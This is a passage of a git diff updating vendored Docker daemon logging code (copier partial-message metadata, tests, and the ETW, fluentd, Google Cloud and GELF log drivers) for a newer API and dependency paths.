Record timestamp for first partial. Use it across partials. + // Initialize Ordinal for first partial. Increment it across partials. + if firstPartial { + msg.Timestamp = time.Now().UTC() + partialTS = msg.Timestamp + partialid = stringid.GenerateRandomID() + ordinal = 1 + firstPartial = false + totalPartialLogs.Inc(1) + } else { + msg.Timestamp = partialTS + } + msg.PLogMetaData = &types.PartialLogMetaData{ID: partialid, Ordinal: ordinal, Last: false} + ordinal++ + hasMorePartial = true + if logErr := c.dst.Log(msg); logErr != nil { + logWritesFailedCount.Inc(1) logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) } p = 0 diff --git a/vendor/github.com/docker/docker/daemon/logger/copier_test.go b/vendor/github.com/docker/docker/daemon/logger/copier_test.go index cfd816a6eb..d09450bd19 100644 --- a/vendor/github.com/docker/docker/daemon/logger/copier_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/copier_test.go @@ -1,4 +1,4 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "bytes" @@ -31,6 +31,25 @@ func (l *TestLoggerJSON) Close() error { return nil } func (l *TestLoggerJSON) Name() string { return "json" } +type TestSizedLoggerJSON struct { + *json.Encoder + mu sync.Mutex +} + +func (l *TestSizedLoggerJSON) Log(m *Message) error { + l.mu.Lock() + defer l.mu.Unlock() + return l.Encode(m) +} + +func (*TestSizedLoggerJSON) Close() error { return nil } + +func (*TestSizedLoggerJSON) Name() string { return "sized-json" } + +func (*TestSizedLoggerJSON) BufSize() int { + return 32 * 1024 +} + func TestCopier(t *testing.T) { stdoutLine := "Line that thinks that it is log line from docker stdout" stderrLine := "Line that thinks that it is log line from docker stderr" @@ -104,10 +123,9 @@ func TestCopier(t *testing.T) { // TestCopierLongLines tests long lines without line breaks func TestCopierLongLines(t *testing.T) { - // Long lines (should be split at "bufSize") - const bufSize = 16 * 1024 - stdoutLongLine := strings.Repeat("a", bufSize) - stderrLongLine := strings.Repeat("b", bufSize) + // Long lines (should be split at "defaultBufSize") + stdoutLongLine := strings.Repeat("a", defaultBufSize) + stderrLongLine := strings.Repeat("b", defaultBufSize) stdoutTrailingLine := "stdout trailing line" stderrTrailingLine := "stderr trailing line" @@ -200,15 +218,185 @@ func TestCopierSlow(t *testing.T) { c.Close() select { case <-time.After(200 * time.Millisecond): - t.Fatalf("failed to exit in time after the copier is closed") + t.Fatal("failed to exit in time after the copier is closed") case <-wait: } } +func TestCopierWithSized(t *testing.T) { + var jsonBuf bytes.Buffer + expectedMsgs := 2 + sizedLogger := &TestSizedLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + logbuf := bytes.NewBufferString(strings.Repeat(".", sizedLogger.BufSize()*expectedMsgs)) + c := NewCopier(map[string]io.Reader{"stdout": logbuf}, sizedLogger) + + c.Run() + // Wait for Copier to finish writing to the buffered logger. + c.Wait() + c.Close() + + recvdMsgs := 0 + dec := json.NewDecoder(&jsonBuf) + for { + var msg Message + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" { + t.Fatalf("Wrong Source: %q, should be %q", msg.Source, "stdout") + } + if len(msg.Line) != sizedLogger.BufSize() { + t.Fatalf("Line was not of expected max length %d, was %d", sizedLogger.BufSize(), len(msg.Line)) + } + recvdMsgs++ + } + if recvdMsgs != expectedMsgs { + t.Fatalf("expected to receive %d messages, actually received %d", expectedMsgs, recvdMsgs) + } +} + +func checkIdentical(t *testing.T, msg Message, expectedID string, expectedTS time.Time) { + if msg.PLogMetaData.ID != expectedID { + t.Fatalf("IDs are not he same across partials. Expected: %s Received: %s", + expectedID, msg.PLogMetaData.ID) + } + if msg.Timestamp != expectedTS { + t.Fatalf("Timestamps are not the same across partials. Expected: %v Received: %v", + expectedTS.Format(time.UnixDate), msg.Timestamp.Format(time.UnixDate)) + } +} + +// Have long lines and make sure that it comes out with PartialMetaData +func TestCopierWithPartial(t *testing.T) { + stdoutLongLine := strings.Repeat("a", defaultBufSize) + stderrLongLine := strings.Repeat("b", defaultBufSize) + stdoutTrailingLine := "stdout trailing line" + stderrTrailingLine := "stderr trailing line" + normalStr := "This is an impartial message :)" + + var stdout bytes.Buffer + var stderr bytes.Buffer + var normalMsg bytes.Buffer + + for i := 0; i < 3; i++ { + if _, err := stdout.WriteString(stdoutLongLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrLongLine); err != nil { + t.Fatal(err) + } + } + + if _, err := stdout.WriteString(stdoutTrailingLine + "\n"); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrTrailingLine + "\n"); err != nil { + t.Fatal(err) + } + if _, err := normalMsg.WriteString(normalStr + "\n"); err != nil { + t.Fatal(err) + } + + var jsonBuf bytes.Buffer + + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + + c := NewCopier( + map[string]io.Reader{ + "stdout": &stdout, + "normal": &normalMsg, + "stderr": &stderr, + }, + jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + select { + case <-time.After(1 * time.Second): + t.Fatal("Copier failed to do its work in 1 second") + case <-wait: + } + + dec := json.NewDecoder(&jsonBuf) + expectedMsgs := 9 + recvMsgs := 0 + var expectedPartID1, expectedPartID2 string + var expectedTS1, expectedTS2 time.Time + + for { + var msg Message + + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" && msg.Source != "stderr" && msg.Source != "normal" { + t.Fatalf("Wrong Source: %q, should be %q or %q or %q", msg.Source, "stdout", "stderr", "normal") + } + + if msg.Source == "stdout" { + if string(msg.Line) != stdoutLongLine && string(msg.Line) != stdoutTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stdoutLongLine' or 'stdoutTrailingLine'", msg.Line) + } + + if msg.PLogMetaData.ID == "" { + t.Fatalf("Expected partial metadata. Got nothing") + } + + if msg.PLogMetaData.Ordinal == 1 { + expectedPartID1 = msg.PLogMetaData.ID + expectedTS1 = msg.Timestamp + } else { + checkIdentical(t, msg, expectedPartID1, expectedTS1) + } + if msg.PLogMetaData.Ordinal == 4 && !msg.PLogMetaData.Last { + t.Fatalf("Last is not set for last chunk") + } + } + + if msg.Source == "stderr" { + if string(msg.Line) != stderrLongLine && string(msg.Line) != stderrTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stderrLongLine' or 'stderrTrailingLine'", msg.Line) + } + + if msg.PLogMetaData.ID == "" { + t.Fatalf("Expected partial metadata. Got nothing") + } + + if msg.PLogMetaData.Ordinal == 1 { + expectedPartID2 = msg.PLogMetaData.ID + expectedTS2 = msg.Timestamp + } else { + checkIdentical(t, msg, expectedPartID2, expectedTS2) + } + if msg.PLogMetaData.Ordinal == 4 && !msg.PLogMetaData.Last { + t.Fatalf("Last is not set for last chunk") + } + } + + if msg.Source == "normal" && msg.PLogMetaData != nil { + t.Fatalf("Normal messages should not have PartialLogMetaData") + } + recvMsgs++ + } + + if expectedMsgs != recvMsgs { + t.Fatalf("Expected msgs: %d Recv msgs: %d", expectedMsgs, recvMsgs) + } +} + type BenchmarkLoggerDummy struct { } -func (l *BenchmarkLoggerDummy) Log(m *Message) error { return nil } +func (l *BenchmarkLoggerDummy) Log(m *Message) error { PutMessage(m); return nil } func (l *BenchmarkLoggerDummy) Close() error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go index f296d7f165..78d3477b61 100644 --- a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go +++ b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go @@ -10,17 +10,16 @@ // // Each container log message generates an ETW event that also contains: // the container name and ID, the timestamp, and the stream type. -package etwlogs +package etwlogs // import "github.com/docker/docker/daemon/logger/etwlogs" import ( "errors" "fmt" "sync" - "syscall" "unsafe" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" + "github.com/sirupsen/logrus" "golang.org/x/sys/windows" ) @@ -42,41 +41,43 @@ var ( procEventWriteString = modAdvapi32.NewProc("EventWriteString") procEventUnregister = modAdvapi32.NewProc("EventUnregister") ) -var providerHandle syscall.Handle +var providerHandle windows.Handle var refCount int var mu sync.Mutex func init() { - providerHandle = syscall.InvalidHandle + providerHandle = windows.InvalidHandle if err := logger.RegisterLogDriver(name, New); err != nil { logrus.Fatal(err) } } // New creates a new etwLogs logger for the given container and registers the EWT provider. -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { if err := registerETWProvider(); err != nil { return nil, err } - logrus.Debugf("logging driver etwLogs configured for container: %s.", ctx.ContainerID) + logrus.Debugf("logging driver etwLogs configured for container: %s.", info.ContainerID) return &etwLogs{ - containerName: fixContainerName(ctx.ContainerName), - imageName: ctx.ContainerImageName, - containerID: ctx.ContainerID, - imageID: ctx.ContainerImageID, + containerName: info.Name(), + imageName: info.ContainerImageName, + containerID: info.ContainerID, + imageID: info.ContainerImageID, }, nil } // Log logs the message to the ETW stream. func (etwLogger *etwLogs) Log(msg *logger.Message) error { - if providerHandle == syscall.InvalidHandle { + if providerHandle == windows.InvalidHandle { // This should never be hit, if it is, it indicates a programming error. errorMessage := "ETWLogs cannot log the message, because the event provider has not been registered." logrus.Error(errorMessage) return errors.New(errorMessage) } - return callEventWriteString(createLogMessage(etwLogger, msg)) + m := createLogMessage(etwLogger, msg) + logger.PutMessage(msg) + return callEventWriteString(m) } // Close closes the logger by unregistering the ETW provider. @@ -99,14 +100,6 @@ func createLogMessage(etwLogger *etwLogs, msg *logger.Message) string { msg.Line) } -// fixContainerName removes the initial '/' from the container name. -func fixContainerName(cntName string) string { - if len(cntName) > 0 && cntName[0] == '/' { - cntName = cntName[1:] - } - return cntName -} - func registerETWProvider() error { mu.Lock() defer mu.Unlock() @@ -127,7 +120,7 @@ func unregisterETWProvider() { if refCount == 1 { if callEventUnregister() { refCount-- - providerHandle = syscall.InvalidHandle + providerHandle = windows.InvalidHandle } // Not returning an error if EventUnregister fails, because etwLogs will continue to work } else { @@ -137,9 +130,11 @@ func unregisterETWProvider() { func callEventRegister() error { // The provider's GUID is {a3693192-9ed6-46d2-a981-f8226c8363bd} - guid := syscall.GUID{ - 0xa3693192, 0x9ed6, 0x46d2, - [8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd}, + guid := windows.GUID{ + Data1: 0xa3693192, + Data2: 0x9ed6, + Data3: 0x46d2, + Data4: [8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd}, } ret, _, _ := procEventRegister.Call(uintptr(unsafe.Pointer(&guid)), 0, 0, uintptr(unsafe.Pointer(&providerHandle))) @@ -152,7 +147,13 @@ func callEventRegister() error { } func callEventWriteString(message string) error { - ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message)))) + utf16message, err := windows.UTF16FromString(message) + + if err != nil { + return err + } + + ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(&utf16message[0]))) if ret != win32CallSuccess { errorMessage := fmt.Sprintf("ETWLogs provider failed to log message. Error: %d", ret) logrus.Error(errorMessage) @@ -163,8 +164,5 @@ func callEventWriteString(message string) error { func callEventUnregister() bool { ret, _, _ := procEventUnregister.Call(uintptr(providerHandle)) - if ret != win32CallSuccess { - return false - } - return true + return ret == win32CallSuccess } diff --git a/vendor/github.com/docker/docker/daemon/logger/factory.go b/vendor/github.com/docker/docker/daemon/logger/factory.go index 9cf716b09a..84b54b2794 100644 --- a/vendor/github.com/docker/docker/daemon/logger/factory.go +++ b/vendor/github.com/docker/docker/daemon/logger/factory.go @@ -1,12 +1,18 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "fmt" + "sort" "sync" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/go-units" + "github.com/pkg/errors" ) // Creator builds a logging driver instance with given context. -type Creator func(Context) (Logger, error) +type Creator func(Info) (Logger, error) // LogOptValidator checks the options specific to the underlying // logging implementation. @@ -18,6 +24,22 @@ type logdriverFactory struct { m sync.Mutex } +func (lf *logdriverFactory) list() []string { + ls := make([]string, 0, len(lf.registry)) + lf.m.Lock() + for name := range lf.registry { + ls = append(ls, name) + } + lf.m.Unlock() + sort.Strings(ls) + return ls +} + +// ListDrivers gets the list of registered log driver names +func ListDrivers() []string { + return factory.list() +} + func (lf *logdriverFactory) register(name string, c Creator) error { if lf.driverRegistered(name) { return fmt.Errorf("logger: log driver named '%s' is already registered", name) @@ -33,6 +55,13 @@ func (lf *logdriverFactory) driverRegistered(name string) bool { lf.m.Lock() _, ok := lf.registry[name] lf.m.Unlock() + if !ok { + if pluginGetter != nil { // this can be nil when the init functions are running + if l, _ := getPlugin(name, plugingetter.Lookup); l != nil { + return true + } + } + } return ok } @@ -52,17 +81,19 @@ func (lf *logdriverFactory) get(name string) (Creator, error) { defer lf.m.Unlock() c, ok := lf.registry[name] - if !ok { - return c, fmt.Errorf("logger: no log driver named '%s' is registered", name) + if ok { + return c, nil } - return c, nil + + c, err := getPlugin(name, plugingetter.Acquire) + return c, errors.Wrapf(err, "logger: no log driver named '%s' is registered", name) } func (lf *logdriverFactory) getLogOptValidator(name string) LogOptValidator { lf.m.Lock() defer lf.m.Unlock() - c, _ := lf.optValidator[name] + c := lf.optValidator[name] return c } @@ -85,6 +116,11 @@ func GetLogDriver(name string) (Creator, error) { return factory.get(name) } +var builtInLogOpts = map[string]bool{ + "mode": true, + "max-buffer-size": true, +} + // ValidateLogOpts checks the options for the given log driver. The // options supported are specific to the LogDriver implementation. func ValidateLogOpts(name string, cfg map[string]string) error { @@ -92,13 +128,35 @@ func ValidateLogOpts(name string, cfg map[string]string) error { return nil } + switch containertypes.LogMode(cfg["mode"]) { + case containertypes.LogModeBlocking, containertypes.LogModeNonBlock, containertypes.LogModeUnset: + default: + return fmt.Errorf("logger: logging mode not supported: %s", cfg["mode"]) + } + + if s, ok := cfg["max-buffer-size"]; ok { + if containertypes.LogMode(cfg["mode"]) != containertypes.LogModeNonBlock { + return fmt.Errorf("logger: max-buffer-size option is only supported with 'mode=%s'", containertypes.LogModeNonBlock) + } + if _, err := units.RAMInBytes(s); err != nil { + return errors.Wrap(err, "error parsing option max-buffer-size") + } + } + if !factory.driverRegistered(name) { return fmt.Errorf("logger: no log driver named '%s' is registered", name) } + filteredOpts := make(map[string]string, len(builtInLogOpts)) + for k, v := range cfg { + if !builtInLogOpts[k] { + filteredOpts[k] = v + } + } + validator := factory.getLogOptValidator(name) if validator != nil { - return validator(cfg) + return validator(filteredOpts) } return nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go index a8303cf97b..907261f41f 100644 --- a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go +++ b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go @@ -1,6 +1,6 @@ // Package fluentd provides the log driver for forwarding server logs // to fluentd endpoints. -package fluentd +package fluentd // import "github.com/docker/docker/daemon/logger/fluentd" import ( "fmt" @@ -11,13 +11,13 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/pkg/urlutil" "github.com/docker/go-units" "github.com/fluent/fluent-logger-golang/fluent" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) type fluentd struct { @@ -48,11 +48,12 @@ const ( defaultRetryWait = 1000 defaultMaxRetries = math.MaxInt32 - addressKey = "fluentd-address" - bufferLimitKey = "fluentd-buffer-limit" - retryWaitKey = "fluentd-retry-wait" - maxRetriesKey = "fluentd-max-retries" - asyncConnectKey = "fluentd-async-connect" + addressKey = "fluentd-address" + bufferLimitKey = "fluentd-buffer-limit" + retryWaitKey = "fluentd-retry-wait" + maxRetriesKey = "fluentd-max-retries" + asyncConnectKey = "fluentd-async-connect" + subSecondPrecisionKey = "fluentd-sub-second-precision" ) func init() { @@ -67,22 +68,25 @@ func init() { // New creates a fluentd logger using the configuration passed in on // the context. The supported context configuration variable is // fluentd-address. -func New(ctx logger.Context) (logger.Logger, error) { - loc, err := parseAddress(ctx.Config[addressKey]) +func New(info logger.Info) (logger.Logger, error) { + loc, err := parseAddress(info.Config[addressKey]) if err != nil { return nil, err } - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } - extra := ctx.ExtraAttributes(nil) + extra, err := info.ExtraAttributes(nil) + if err != nil { + return nil, err + } bufferLimit := defaultBufferLimit - if ctx.Config[bufferLimitKey] != "" { - bl64, err := units.RAMInBytes(ctx.Config[bufferLimitKey]) + if info.Config[bufferLimitKey] != "" { + bl64, err := units.RAMInBytes(info.Config[bufferLimitKey]) if err != nil { return nil, err } @@ -90,8 +94,8 @@ func New(ctx logger.Context) (logger.Logger, error) { } retryWait := defaultRetryWait - if ctx.Config[retryWaitKey] != "" { - rwd, err := time.ParseDuration(ctx.Config[retryWaitKey]) + if info.Config[retryWaitKey] != "" { + rwd, err := time.ParseDuration(info.Config[retryWaitKey]) if err != nil { return nil, err } @@ -99,8 +103,8 @@ func New(ctx logger.Context) (logger.Logger, error) { } maxRetries := defaultMaxRetries - if ctx.Config[maxRetriesKey] != "" { - mr64, err := strconv.ParseUint(ctx.Config[maxRetriesKey], 10, strconv.IntSize) + if info.Config[maxRetriesKey] != "" { + mr64, err := strconv.ParseUint(info.Config[maxRetriesKey], 10, strconv.IntSize) if err != nil { return nil, err } @@ -108,24 +112,32 @@ func New(ctx logger.Context) (logger.Logger, error) { } asyncConnect := false - if ctx.Config[asyncConnectKey] != "" { - if asyncConnect, err = strconv.ParseBool(ctx.Config[asyncConnectKey]); err != nil { + if info.Config[asyncConnectKey] != "" { + if asyncConnect, err = strconv.ParseBool(info.Config[asyncConnectKey]); err != nil { + return nil, err + } + } + + subSecondPrecision := false + if info.Config[subSecondPrecisionKey] != "" { + if subSecondPrecision, err = strconv.ParseBool(info.Config[subSecondPrecisionKey]); err != nil { return nil, err } } fluentConfig := fluent.Config{ - FluentPort: loc.port, - FluentHost: loc.host, - FluentNetwork: loc.protocol, - FluentSocketPath: loc.path, - BufferLimit: bufferLimit, - RetryWait: retryWait, - MaxRetry: maxRetries, - AsyncConnect: asyncConnect, + FluentPort: loc.port, + FluentHost: loc.host, + FluentNetwork: loc.protocol, + FluentSocketPath: loc.path, + BufferLimit: bufferLimit, + RetryWait: retryWait, + MaxRetry: maxRetries, + AsyncConnect: asyncConnect, + SubSecondPrecision: subSecondPrecision, } - logrus.WithField("container", ctx.ContainerID).WithField("config", fluentConfig). + logrus.WithField("container", info.ContainerID).WithField("config", fluentConfig). Debug("logging driver fluentd configured") log, err := fluent.New(fluentConfig) @@ -134,8 +146,8 @@ func New(ctx logger.Context) (logger.Logger, error) { } return &fluentd{ tag: tag, - containerID: ctx.ContainerID, - containerName: ctx.ContainerName, + containerID: info.ContainerID, + containerName: info.ContainerName, writer: log, extra: extra, }, nil @@ -151,9 +163,15 @@ func (f *fluentd) Log(msg *logger.Message) error { for k, v := range f.extra { data[k] = v } + if msg.PLogMetaData != nil { + data["partial_message"] = "true" + } + + ts := msg.Timestamp + logger.PutMessage(msg) // fluent-logger-golang buffers logs from failures and disconnections, // and these are transferred again automatically. - return f.writer.PostWithTime(f.tag, msg.Timestamp, data) + return f.writer.PostWithTime(f.tag, ts, data) } func (f *fluentd) Close() error { @@ -169,6 +187,7 @@ func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case "env": + case "env-regex": case "labels": case "tag": case addressKey: @@ -176,17 +195,15 @@ func ValidateLogOpt(cfg map[string]string) error { case retryWaitKey: case maxRetriesKey: case asyncConnectKey: + case subSecondPrecisionKey: // Accepted default: return fmt.Errorf("unknown log opt '%s' for fluentd log driver", key) } } - if _, err := parseAddress(cfg["fluentd-address"]); err != nil { - return err - } - - return nil + _, err := parseAddress(cfg[addressKey]) + return err } func parseAddress(address string) (*location, error) { diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go index 9a8c1c903f..1699f67a2d 100644 --- a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go @@ -1,6 +1,7 @@ -package gcplogs +package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs" import ( + "context" "fmt" "sync" "sync/atomic" @@ -8,22 +9,23 @@ import ( "github.com/docker/docker/daemon/logger" - "github.com/Sirupsen/logrus" - "golang.org/x/net/context" - "google.golang.org/cloud/compute/metadata" - "google.golang.org/cloud/logging" + "cloud.google.com/go/compute/metadata" + "cloud.google.com/go/logging" + "github.com/sirupsen/logrus" + mrpb "google.golang.org/genproto/googleapis/api/monitoredres" ) const ( name = "gcplogs" - projectOptKey = "gcp-project" - logLabelsKey = "labels" - logEnvKey = "env" - logCmdKey = "gcp-log-cmd" - logZoneKey = "gcp-meta-zone" - logNameKey = "gcp-meta-name" - logIDKey = "gcp-meta-id" + projectOptKey = "gcp-project" + logLabelsKey = "labels" + logEnvKey = "env" + logEnvRegexKey = "env-regex" + logCmdKey = "gcp-log-cmd" + logZoneKey = "gcp-meta-zone" + logNameKey = "gcp-meta-name" + logIDKey = "gcp-meta-id" ) var ( @@ -51,7 +53,7 @@ func init() { } type gcplogs struct { - client *logging.Client + logger *logging.Logger instance *instanceInfo container *containerInfo } @@ -59,7 +61,7 @@ type gcplogs struct { type dockerLogEntry struct { Instance *instanceInfo `json:"instance,omitempty"` Container *containerInfo `json:"container,omitempty"` - Data string `json:"data,omitempty"` + Message string `json:"message,omitempty"` } type instanceInfo struct { @@ -87,7 +89,7 @@ func initGCP() { // These will fail on instances if the metadata service is // down or the client is compiled with an API version that // has been removed. Since these are not vital, let's ignore - // them and make their fields in the dockeLogEntry ,omitempty + // them and make their fields in the dockerLogEntry ,omitempty projectID, _ = metadata.ProjectID() zone, _ = metadata.Zone() instanceName, _ = metadata.InstanceName() @@ -100,68 +102,104 @@ func initGCP() { // default credentials. // // See https://developers.google.com/identity/protocols/application-default-credentials -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { initGCP() var project string if projectID != "" { project = projectID } - if projectID, found := ctx.Config[projectOptKey]; found { + if projectID, found := info.Config[projectOptKey]; found { project = projectID } if project == "" { - return nil, fmt.Errorf("No project was specified and couldn't read project from the meatadata server. Please specify a project") + return nil, fmt.Errorf("No project was specified and couldn't read project from the metadata server. Please specify a project") } - c, err := logging.NewClient(context.Background(), project, "gcplogs-docker-driver") + // Issue #29344: gcplogs segfaults (static binary) + // If HOME is not set, logging.NewClient() will call os/user.Current() via oauth2/google. + // However, in static binary, os/user.Current() leads to segfault due to a glibc issue that won't be fixed + // in a short term. (golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341) + // So we forcibly set HOME so as to avoid call to os/user/Current() + if err := ensureHomeIfIAmStatic(); err != nil { + return nil, err + } + + c, err := logging.NewClient(context.Background(), project) if err != nil { return nil, err } + var instanceResource *instanceInfo + if onGCE { + instanceResource = &instanceInfo{ + Zone: zone, + Name: instanceName, + ID: instanceID, + } + } else if info.Config[logZoneKey] != "" || info.Config[logNameKey] != "" || info.Config[logIDKey] != "" { + instanceResource = &instanceInfo{ + Zone: info.Config[logZoneKey], + Name: info.Config[logNameKey], + ID: info.Config[logIDKey], + } + } - if err := c.Ping(); err != nil { + options := []logging.LoggerOption{} + if instanceResource != nil { + vmMrpb := logging.CommonResource( + &mrpb.MonitoredResource{ + Type: "gce_instance", + Labels: map[string]string{ + "instance_id": instanceResource.ID, + "zone": instanceResource.Zone, + }, + }, + ) + options = []logging.LoggerOption{vmMrpb} + } + lg := c.Logger("gcplogs-docker-driver", options...) + + if err := c.Ping(context.Background()); err != nil { return nil, fmt.Errorf("unable to connect or authenticate with Google Cloud Logging: %v", err) } + extraAttributes, err := info.ExtraAttributes(nil) + if err != nil { + return nil, err + } + l := &gcplogs{ - client: c, + logger: lg, container: &containerInfo{ - Name: ctx.ContainerName, - ID: ctx.ContainerID, - ImageName: ctx.ContainerImageName, - ImageID: ctx.ContainerImageID, - Created: ctx.ContainerCreated, - Metadata: ctx.ExtraAttributes(nil), + Name: info.ContainerName, + ID: info.ContainerID, + ImageName: info.ContainerImageName, + ImageID: info.ContainerImageID, + Created: info.ContainerCreated, + Metadata: extraAttributes, }, } - if ctx.Config[logCmdKey] == "true" { - l.container.Command = ctx.Command() + if info.Config[logCmdKey] == "true" { + l.container.Command = info.Command() } - if onGCE { - l.instance = &instanceInfo{ - Zone: zone, - Name: instanceName, - ID: instanceID, - } - } else if ctx.Config[logZoneKey] != "" || ctx.Config[logNameKey] != "" || ctx.Config[logIDKey] != "" { - l.instance = &instanceInfo{ - Zone: ctx.Config[logZoneKey], - Name: ctx.Config[logNameKey], - ID: ctx.Config[logIDKey], - } + if instanceResource != nil { + l.instance = instanceResource } // The logger "overflows" at a rate of 10,000 logs per second and this // overflow func is called. We want to surface the error to the user // without overly spamming /var/log/docker.log so we log the first time // we overflow and every 1000th time after. - c.Overflow = func(_ *logging.Client, _ logging.Entry) error { - if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 { - logrus.Errorf("gcplogs driver has dropped %v logs", i) + c.OnError = func(err error) { + if err == logging.ErrOverflow { + if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 { + logrus.Errorf("gcplogs driver has dropped %v logs", i) + } + } else { + logrus.Error(err) } - return nil } return l, nil @@ -172,7 +210,7 @@ func New(ctx logger.Context) (logger.Logger, error) { func ValidateLogOpts(cfg map[string]string) error { for k := range cfg { switch k { - case projectOptKey, logLabelsKey, logEnvKey, logCmdKey, logZoneKey, logNameKey, logIDKey: + case projectOptKey, logLabelsKey, logEnvKey, logEnvRegexKey, logCmdKey, logZoneKey, logNameKey, logIDKey: default: return fmt.Errorf("%q is not a valid option for the gcplogs driver", k) } @@ -181,18 +219,24 @@ func ValidateLogOpts(cfg map[string]string) error { } func (l *gcplogs) Log(m *logger.Message) error { - return l.client.Log(logging.Entry{ - Time: m.Timestamp, + message := string(m.Line) + ts := m.Timestamp + logger.PutMessage(m) + + l.logger.Log(logging.Entry{ + Timestamp: ts, Payload: &dockerLogEntry{ Instance: l.instance, Container: l.container, - Data: string(m.Line), + Message: message, }, }) + return nil } func (l *gcplogs) Close() error { - return l.client.Flush() + l.logger.Flush() + return nil } func (l *gcplogs) Name() string { diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go new file mode 100644 index 0000000000..27f8ef32f5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go @@ -0,0 +1,29 @@ +package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs" + +import ( + "os" + + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/homedir" + "github.com/sirupsen/logrus" +) + +// ensureHomeIfIAmStatic ensure $HOME to be set if dockerversion.IAmStatic is "true". +// See issue #29344: gcplogs segfaults (static binary) +// If HOME is not set, logging.NewClient() will call os/user.Current() via oauth2/google. +// However, in static binary, os/user.Current() leads to segfault due to a glibc issue that won't be fixed +// in a short term. (golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341) +// So we forcibly set HOME so as to avoid call to os/user/Current() +func ensureHomeIfIAmStatic() error { + // Note: dockerversion.IAmStatic and homedir.GetStatic() is only available for linux. + // So we need to use them in this gcplogging_linux.go rather than in gcplogging.go + if dockerversion.IAmStatic == "true" && os.Getenv("HOME") == "" { + home, err := homedir.GetStatic() + if err != nil { + return err + } + logrus.Warnf("gcplogs requires HOME to be set for static daemon binary. Forcibly setting HOME to %s.", home) + os.Setenv("HOME", home) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go new file mode 100644 index 0000000000..10a2cdc8cd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go @@ -0,0 +1,7 @@ +// +build !linux + +package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs" + +func ensureHomeIfIAmStatic() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go index 95860ac083..e9c860406a 100644 --- a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go @@ -1,11 +1,8 @@ -// +build linux - // Package gelf provides the log driver for forwarding server logs to // endpoints that support the Graylog Extended Log Format. -package gelf +package gelf // import "github.com/docker/docker/daemon/logger/gelf" import ( - "bytes" "compress/flate" "encoding/json" "fmt" @@ -15,17 +12,17 @@ import ( "time" "github.com/Graylog2/go-gelf/gelf" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/pkg/urlutil" + "github.com/sirupsen/logrus" ) const name = "gelf" type gelfLogger struct { - writer *gelf.Writer - ctx logger.Context + writer gelf.Writer + info logger.Info hostname string rawExtra 